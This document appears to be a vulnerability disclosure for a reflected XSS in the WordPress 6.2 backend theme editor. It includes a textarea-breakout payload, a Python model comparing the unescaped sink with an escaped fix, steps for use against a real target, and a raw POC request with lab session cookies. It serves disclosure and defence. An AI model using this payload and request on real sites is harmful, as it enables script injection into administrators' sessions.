WordPress 6.2: Reflected XSS in the backend theme editor (/wp-admin/theme-editor.php)
Description
The theme file editor in the admin backend is vulnerable to reflected XSS through the POST parameter newcontent when the POST parameter theme is absent from the request.
Affected Version
WordPress <= 6.2
POC
Log in to the admin backend and open a theme file in the theme file editor component.
Send a POST request to /wp-admin/theme-editor.php that carries a valid WordPress nonce and a newcontent parameter containing the XSS payload, e.g. </textarea><img src=x onerror=alert(1)><!--, and omit the theme parameter from the request body. Because the request must carry the nonce of the administrator who is logged in, the payload executes in that administrator's own session; an unauthenticated third party cannot supply a valid nonce.
In the source code of /wp-admin/theme-editor.php, at line 125 the value of newcontent is assigned to $post_content after wp_unslash(); wp_unslash() only strips slashes and does not escape or filter any XSS payload.
At line 129, $post_content is assigned to $content, and at line 291 $content is echoed directly into the page's HTML inside the editor's <textarea>, so a value containing </textarea> closes the element early and the remainder is parsed as markup.
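The following is an added example, not code from the original report or from WordPress. It models the sink described above (newcontent -> wp_unslash -> echo inside <textarea>) next to the same sink escaped with the equivalent of WordPress's esc_textarea(), builds the POC body without the theme parameter, and checks whether a rendered response lets the payload break out of the textarea. The sample editor page, its nonce value, and the helper names are constructed assumptions; no request is sent to a live site.

```python
"""Model of the theme-editor.php reflected-XSS sink and a POC request builder.

Added example for this report. The HTML fixture, the nonce value and the
function names below are constructed for illustration; they are not taken
from WordPress. wp_unslash()/esc_textarea() are Python approximations of
the PHP functions of the same name.
"""
import html
import re
from urllib.parse import parse_qs, urlencode

# Payload from the report: closes the textarea early, then injects markup.
PAYLOAD = "</textarea><img src=x onerror=alert(1)><!--"

# Constructed sample of the editor form as the browser would receive it.
# The nonce "a1b2c3d4e5" is made up for the example.
SAMPLE_EDITOR_PAGE = """
<form name="template" id="template" action="theme-editor.php" method="post">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="a1b2c3d4e5" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/theme-editor.php" />
<input type="hidden" name="file" value="style.css" />
<input type="hidden" name="theme" value="twentytwentythree" />
<input type="hidden" name="action" value="update" />
<textarea cols="70" rows="30" name="newcontent" id="newcontent">/* css */</textarea>
</form>
"""

NONCE_RE = re.compile(r'name="_wpnonce"\s+value="([0-9a-f]+)"')
TEXTAREA_CLOSE_RE = re.compile(r"</textarea\s*[>/]", re.IGNORECASE)


def extract_nonce(page: str) -> str:
    """Pull the per-form nonce out of the editor page; the POST is rejected without it."""
    match = NONCE_RE.search(page)
    if not match:
        raise ValueError("no _wpnonce field found in page")
    return match.group(1)


def build_poc_body(nonce: str, payload: str = PAYLOAD, file: str = "style.css") -> str:
    """Form body for the POC: the form's fields minus 'theme', as the report requires."""
    return urlencode({"_wpnonce": nonce, "action": "update", "file": file, "newcontent": payload})


def wp_unslash(value: str) -> str:
    """Approximation of PHP stripslashes(): removes backslashes, escapes nothing."""
    return re.sub(r"\\(.?)", r"\1", value, flags=re.S)


def esc_textarea(value: str) -> str:
    """Approximation of WordPress esc_textarea() (htmlspecialchars with ENT_QUOTES)."""
    return html.escape(value, quote=True)


def _newcontent(post_body: str) -> str:
    return parse_qs(post_body)["newcontent"][0]


def render_vulnerable(post_body: str) -> str:
    """Sink as the report describes it: unslashed value echoed straight into the textarea."""
    content = wp_unslash(_newcontent(post_body))
    return f'<textarea name="newcontent" id="newcontent">{content}</textarea>'


def render_fixed(post_body: str) -> str:
    """Same sink with the textarea content escaped before output."""
    content = esc_textarea(wp_unslash(_newcontent(post_body)))
    return f'<textarea name="newcontent" id="newcontent">{content}</textarea>'


def breaks_out_of_textarea(rendered: str) -> bool:
    """A single textarea should close exactly once; a second close tag means
    the reflected value ended the element early and the rest is live markup."""
    return len(TEXTAREA_CLOSE_RE.findall(rendered)) > 1


if __name__ == "__main__":
    nonce = extract_nonce(SAMPLE_EDITOR_PAGE)
    body = build_poc_body(nonce)
    print("POST body:", body)
    print("vulnerable breaks out:", breaks_out_of_textarea(render_vulnerable(body)))
    print("escaped breaks out:   ", breaks_out_of_textarea(render_fixed(body)))
```

Against a real target, the same three steps apply: fetch the editor page with the admin session to read _wpnonce, POST the body from build_poc_body() to /wp-admin/theme-editor.php, and run breaks_out_of_textarea() over the response body. A second </textarea> in the response is the unescaped reflection; an escaped reflection shows up as the literal text &lt;/textarea&gt; inside the editor instead.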
Full POC request:
POST /cms/wordpress/wp-admin/theme-editor.php HTTP/1.1
Host: 192.168.0.10
Content-Length: 193
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.10
Referer: http://192.168.0.10/cms/wordpress/wp-admin/theme-editor.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: wordpress_a59a53e68d3cbba0d705bf0e4b02207b=admin%7C1678689608%7C1S0SKogKJyuDtqkpi3cDcwCyeAvKDNdQ6OW4BtMYgJQ%7Caf4d97cb01e4752e872af6fc5226c89263904830dda087656dbbd0fa79fcf29a; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_a59a53e68d3cbba0d705bf0e4b02207b=admin%7C1678689608%7C1S0SKogKJyuDtqkpi3cDcwCyeAvKDNdQ6OW4BtMYgJQ%7Ce2441da59527b55b9831572be4c5a5955c9acb44a4d72e2477feabfbb4efba21; wp-settings-time-1=1677480056; PHPSESSID=m7h7isuus6cugk6mb58vdah296
Connection: close